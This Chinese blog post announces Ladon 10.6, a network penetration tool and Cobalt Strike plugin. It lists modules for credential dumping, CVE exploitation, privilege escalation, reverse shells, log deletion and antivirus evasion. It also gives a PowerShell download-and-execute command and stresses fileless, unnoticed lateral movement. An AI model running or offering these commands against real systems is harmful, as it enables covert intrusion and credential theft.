Ladon 10.6 & CobaltStirke 祝大家新年快乐

margin

Ladon 10.6 & CobaltStirke 祝大家新年快乐 (qq.com)

Ladon简介

Ladon模块化网络渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.6版本内置194个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用非常简单:  Ladon 目标 模块

• 
  

Ladon 192.168.1.1/c MS17010  扫描C段SMB漏洞Ladon https://192.168.1.1 WhatCMS 识别网络设备、CMS等Ladon ip.txt SmbScan    批量IP 445端口密码审计Ladon ip.txt 401Scan    批量IP 401认证密码审记

Ladon 10.6 2023.1.18更新功能

1. 
   
2. Ladon 10.6 2023.1.18
   
3. [u]CiscoPwd      路由器CiscoDump更名为CiscoPwd   
   
4. [+]NetGearPwd  路由器DGND3700v2登陆密码读取
   
5. [+]MSNSwitchPwd  路由器MSNSwitch登陆密码读取 CVE-2022-32429
   
6. [u]WhatCMS     智能识别未知网络设备(路由器、打印机、摄像头等)
   
7. [u]RunAs    以另一用户身份执行命令 模拟用户登陆执行命令
   
8. 
   
9. 
   
10. Ladon 10.5 2023.1.11
    
11. [+]GetID 获取电脑唯一标识UUID、GUID、Bios、硬盘、CPU、MAC地址(所有网卡，之前版本只获取在用网卡MAC)
    
12. [u]WhatCMS 支持以下品牌路由器识别
    
13. Broadband
    
14. Sagemcom系列
    
15. Sagemcom TR-069
    
16. NETGEAR系列
    
17. NETGEAR R6400
    
18. NETGEAR R8000P
    
19. NETGEAR R6700v3
    
20. NETGEAR WGR614v9
    
21. MI系列
    
22. Router MI-3
    
23. D-link系列
    
24. D-LINK DIR-650IN
    
25. D-Link Wireless N DIR-524
    
26. COMMSCOPE
    
27. ASUS系列
    
28. ASUS WL-500gP
    
29. TP-LINK系列
    
30. TP-Link C2
    
31. ZyXEL系列
    
32. ZyXEL Keenetic II
    
33. Cisco
    
34. Cisco Linksys系列
    
35. Linksys WRT54GL
    
36. Linksys E2500
    
37. Cisco Broadband Access Center
    
38. Huawei系列
    
39. HUAWEI-3COM BR104
    
40. H3C系列
    
41. VisualSVN Server

复制代码

​

Ladon Study 学习模式 一键渗透
对于不熟悉Ladon的新手，可本地使用Study学习，也可直接一键使用。功能模块分类详细，一目了然。GUI程序不方便命令行下渗透，内渗时我们开好代理之后，本地使用即可非常方便。如果你正在渗透外网，批量挖洞提交SRC，就不用做代理了，使用对应模块，扫指定C段即可。

​

编辑
Ladon GUI 加密解密、混淆免杀、处理资产、反弹SHELL
Wiki: http://k8gege.org/Ladon  也可GUI上直接搜索关键字查看

​

编辑
LadonEXP 不懂编程，一键生成EXP

​

编辑
Ladon 10.6 For PowerShell
发现一些LS在使用Github上的旧版，PowerShell内存加载使用，反倒是一些渗透的直接把EXE丢过去使用，当然可能也有不少人内存加载Ladon无文件落地渗透扫描。

​

1. 
   
2. 0x001 Cmd
   
3. powershell
   
4. Import-Module .\Ladon.ps1
   
5. Ladon OnlinePC
   
6. 
   
7. 0x002 Local
   
8. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
   
9. 
   
10. 0x003 Remote
    
11. powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
    
12. 
    
13. 0x004 Bypass
    
14. powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC
    
15. 
    
16. 0x005 Diy PortScan
    
17. powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

复制代码

​

​

编辑

Ladon 10.6 For Cobalt Strike

发现一些LS在使用Github上的旧版，PowerShell内存加载使用，反倒是一些渗透的直接把EXE丢过去使用，当然可能也有不少人内存加载Ladon无文件落地渗透扫描。
​10.6插件包含209个功能，大家按需使用，GUI右键分类详细直观。当目标上控CS后，加载cna脚本，使用Ladon执行任何动作都是内存加载，无需落地程序，不管是直接beacon命令行还是GUI右键菜单操作。以下情况只需上传相关txt，若需要批量扫描C段比如内网有100个C段使用ip24.txt，内网有10个B段使用ip16.txt，密码审计需上传对应密码字典如user.txt、pass.txt或userpass.txt，对应模块运行需加载，寻找路径为当前执行命令目录，所以需要上传这些无害的txt，执行Ladon时，CD到存有这些TXT目录即可，无需上传Ladon.exe，就是整个过程目标不知道你用Ladon横向渗透。
​

​

编辑

​

编辑
正在上传…重新上传取消

​

编辑

​

编辑

​

编辑

​

编辑

​

编辑

​

编辑

​

编辑
​

1. 
   
2. =======================
   
3. Ladon 10.6 巨龙拉冬
   
4. CS右键209个功能模块
   
5. Update 2023.01.18
   
6. =======================
   
7. 
   
8. 0x001 网络资产收集 22
   
9. 
   
10. 1.多协议探测存活主机
    
11. 2.多协议探测存活IP
    
12. 3.仅ICMP探测存活(快)
    
13. 4.系统Ping探测存活
    
14. 5.Oxid多网卡主机探测
    
15. 6.DNS多网卡主机探测
    
16. 7.多协议操作系统探测
    
17. 8.网站、标题、Banner
    
18. 9.智能网站CMS识别
    
19. 10.端口扫描-服务探测
    
20. 11.Shiro网站探测
    
21. 12.Cisco设备探测
    
22. 13.SSL证书探测
    
23. 14.WP插件信息探测
    
24. 15.LDAP服务器探测
    
25. 16.FTP服务器探测
    
26. 17.枚举MSSQL服务器
    
27. 18.枚举共享资源
    
28. 19.打印机探测
    
29. 20.Exchange版本探测
    
30. 21.HTTP/S探测返回头
    
31. 22.HTTP/S探测网页域名
    
32. 
    
33. 
    
34. 0x002 系统信息探测 8
    
35. 
    
36. 1.SMB探测系统信息
    
37. 2.WMI探测系统信息
    
38. 3.NBT探测系统信息
    
39. 4.RDP探测系统信息
    
40. 5.SNMP探测系统信息
    
41. 6.MSSQL探测系统信息
    
42. 7.WINRM探测系统信息
    
43. 8.Exchange探测系统信息
    
44. 
    
45. 0x003 远程漏洞检测 11
    
46. 
    
47. 1.SMB永恒之蓝检测-445
    
48. 2.SMB永恒之黑检测-445
    
49. 3.Struts2漏洞检测-WEB
    
50. 4.Weblogic漏洞检测-WEB
    
51. 5.PhpStudy后门检测-WEB
    
52. 6.ActiveMQ漏洞检测-WEB
    
53. 7.Tomcat漏洞检测-WEB
    
54. 8.CVE-2020-8515漏洞检测-WEB
    
55. 9.CVE-2022-23164漏洞检测-WEB
    
56. 10.Zimbra邮服CVE-2022-27925漏洞检测-WEB
    
57. 11.打印机PJL远程代码执行漏洞检测
    
58. 
    
59. 0x004 本机信息收集 20
    
60. 
    
61. 1.查看本机IP(内外网)
    
62. 2.当前用户、特权信息
    
63. 3.GUID、CPUID、DiskID
    
64. 4.基础信息(仅cmd获取)
    
65. 5.基础信息(含wmi获取)
    
66. 6.获取命令行参数
    
67. 7.获取进程详细信息
    
68. 8.查看IE代理信息
    
69. 9.查看本机命名管道
    
70. 10.查看3389远程连接
    
71. 11.查看USB使用记录
    
72. 12.查看管理员组用户
    
73. 13.查看最近访问文件
    
74. 14.查看安装.NET版本
    
75. 15.查看PowerShell版本
    
76. 16.查看已安装程序版本
    
77. 17.查看OS倍数.NET版本
    
78. 18.列全盘目录(RAR打包)
    
79. 19.查看注册表启动项、
    
80. 20.查看系统劫持DLL
    
81. 
    
82. 0x005 本机密码读取 13
    
83. 
    
84. 1 Chrome浏览器密码
    
85. 2 Firefox浏览器密码
    
86. 3 CocCoc浏览器密码
    
87. 4 Edge浏览器密码
    
88. 5 Wifi连接密码
    
89. 6 IIS站点密码
    
90. 7 FileZilla FTP密码
    
91. 8 VPN连接密码 CVE-2021-36934
    
92. 9 Dump Lass密码
    
93. 10 Navicat密码
    
94. 11 TeamView密码
    
95. 12 Xshell密码
    
96. 13 SecureCRT密码
    
97. 
    
98. 0x006 一键GetShell远程漏洞EXP 11
    
99. 
    
100. 1.Exchange CVE-2020-0688
     
101. 2.Weblogic GetShell
     
102. 3.Tomcat GetShell
     
103. 4 Confluence CVE-2022-23164漏洞EXP
     
104. 5 DrayTek CVE-2020-8515漏洞EXP
     
105. 6 Zimbra邮服CVE-2022-27925漏洞EXP
     
106. 7 ForiGate CVE-2022-40684 EXP
     
107. 8 Mikrotik CVE-2018-14847 Exp
     
108. 9 MSNSwitch路由器密码读取EXP
     
109. 10 NetGear路由器密码读取EXP
     
110. 11 Cisco RV320/325路由器密码读取EXP
     
111. 
     
112. 0x007 网络密码嗅探 2
     
113. 
     
114. 1.FTP密码嗅探
     
115. 2.HTTP密码嗅探
     
116. 
     
117. 0x008 网络密码审计 24
     
118. 
     
119. 1.445端口SMB密码审计(Windows)
     
120. 2.135端口WMI密码审计(Windows)
     
121. 3.445端口SMB-HASH密码审计(Windows)
     
122. 4.135端口WMI-HASH密码审计(Windows)
     
123. 5.139端口NBT密码审计(Windows)
     
124. 6.5985端口Winrm密码审计(Windows)
     
125. 7.21端口FTP密码审计(多平台)
     
126. 8.5900端口VNC密码审计(多平台)
     
127. 9.389端口LDAP密码审计(Windows)
     
128. 10.1521端口Oracle数据库密码审计(多平台)
     
129. 11.1433端口MSSQL数据库密码审计(Windows)
     
130. 12.3306端口MYSQL数据库密码审计(多平台)
     
131. 13.7001端口Weblogic后台密码审计(多平台)
     
132. 14.Web端口Tomcat后台密码审计(多平台)
     
133. 15.Web端口401基础认证密码审计(多平台)
     
134. 16.22端口SSH密码审计(Linux_多平台)
     
135. 17.网络摄像头密码审计(401认证)
     
136. 18.WEB网站后台目录/页面存活扫描
     
137. 19 443端口Exchange密码审计(Windows)
     
138. 20 WordPress后台密码审计(Web)
     
139. 21 Draytek路由器密码审计(Web)
     
140. 22 Cisco路由器密码审计(Web)
     
141. 23 ZTE中兴路由器密码审计(Web)[X]
     
142. 24 ZTE中兴路由器密码审计(Telnet)
     
143. 
     
144. 0x009 本机执行 5
     
145. 
     
146. 1.sc服务执行(system权限)
     
147. 2.at计划任务(system权限)
     
148. 3.Runas(模拟用户执行)
     
149. 4.RunPS(无powershell执行)
     
150. 5.ForExec(循环执行命令)
     
151. 
     
152. 0x010 远程执行 15
     
153. 
     
154. 1.WinrmExec
     
155. 2.SshExec
     
156. 3.SmbExec
     
157. 4.PsExec
     
158. 5.AtExec
     
159. 6.WmiExec
     
160. 7.WmiExec2
     
161. 8.WinrmExec
     
162. 9.JspShell
     
163. 10.AspShell
     
164. 11.AspxShell
     
165. 12.PhpShell
     
166. 13.MssqlCmd
     
167. 14.OracleCmd
     
168. 15.MysqlCmd
     
169. 
     
170. 0x011 本地提权 12
     
171. 
     
172. 1.BypassUac
     
173.   1.eventvwr
     
174.   2.fodhelper
     
175.   3.computerdefaults
     
176.   4.sdclt
     
177.   5.slui
     
178. 
     
179. 2.BypassUac2
     
180. 3.Admin2System
     
181. 4.System2Admin
     
182. 5.Runas
     
183. 6.ms16135 X64
     
184. 7.BadPotato
     
185. 8.SweetPotato
     
186. 9.RDPHijack
     
187. 10.CVE-2021-1675
     
188. 11.Priviledges
     
189.   0.SetPriviledge
     
190.   1.SetDebugPriv
     
191.   2.SetAuditPriv
     
192.   3.SetImpersonate
     
193.   4.SetCreateToken
     
194.   5.SetAssignPrimaryToken
     
195. 12.Beacon2System
     
196. 
     
197. 0x012 自启动 2
     
198. 
     
199. 1.注册表自启动
     
200. 2.服务启动项
     
201. 
     
202. 0x013 3389远程桌面 6
     
203. 
     
204. 1.一键开启3389
     
205. 2.查看3389远程连接
     
206. 3.查看管理员组用户
     
207. 4.激活Administrator
     
208. 5.激活用户Guest
     
209. 6.远程桌面会话劫持
     
210. 
     
211. 0x014 远程下载 2
     
212. 
     
213. 1.Http文件下载
     
214. 2.FTP文件下载
     
215. 
     
216. 0x015 域(DC、LDAP) 6
     
217. 
     
218. 1.域内机器信息获取(域内)
     
219. 2.389端口LDAP服务器探测
     
220. 3.389端口LDAP密码审计
     
221. 4.CVE-2020-1472域控提权
     
222. 5 枚举域内主机、IP、共享资源
     
223. 6 查询域内用户机器名、IP(域内)
     
224. 
     
225. 0x016 端口转发 2
     
226. 
     
227. 1.netsh(系统自带)
     
228. 2.PortTran
     
229. 
     
230. 0x017 MSF/NC联动 6
     
231. 
     
232. 1.Shell_bind_tcp
     
233. 2.Shell_reverse_tcp
     
234. 3.Met_reverse_http
     
235. 4.Met_reverse_https
     
236. 5.Shell_reverse_icmp
     
237. 6.Shell_reverse_dns
     
238. 
     
239. 0x018 其它功能 10
     
240. 
     
241. 1.内存加载.NET测试
     
242. 2.PowerShell测试版本
     
243. 3.Win2008启用.net3.5
     
244. 4.网站HTML源码查看
     
245. 5.网站域名解析IP
     
246. 6.PC机器名解析IP
     
247. 7 删除Tomcat指定IP日志
     
248. 8 改注册表读取系统明文密码
     
249. 9 修改注册表劫持签名签证
     
250. 10 读取大文件指定长度内容
     
251. 
     
252. 以下为系统自带命令，Ladon无法加载也不影响
     
253. 0x019 CMD命令信息收集 15+10+5
     
254. 0.查看系统信息
     
255. 1.查看.NET版本
     
256. 2.查看保存凭证
     
257. 3.查看Defender
     
258. 4.查看当前特权
     
259. 5.查看当前WIFI
     
260. 6.查看机器GUID
     
261. 7.查看机器名称
     
262. 8.查看RDP端口
     
263. 9.查看进程列表
     
264. 10.查看服务列表
     
265. 11.查看安装程序
     
266. 12.查看启动列表
     
267. 13.查看防火墙规则
     
268. 14.查看路由表信息
     
269. 15.查看网络连接
     
270. 16.用户操作
     
271.   1.查看当前用户
     
272.   2.查看本机管理员
     
273.   3.查看本机用户
     
274.   4.查看域管理员
     
275.   5.查看域用户
     
276.   6.激活Administrator
     
277.   7.激活Guest
     
278.   8.Guest加管理员组
     
279.   9.禁用Administrator
     
280.   10.禁用Guest
     
281. 17.查看机器列表
     
282. 18.查看补丁信息
     
283. 19.域信息收集
     
284.   1 查看当前登陆域
     
285.   2 查看域信息
     
286.   3 查看域时间
     
287.   4 查看域管理员
     
288.   5 查看域用户
     
289. 
     
290. 0x020 PowerShell信息收集 2
     
291. 1.查看PowerShell版本
     
292. 2.查看当前登陆用户
     
293. ...其它功能下版本更新

复制代码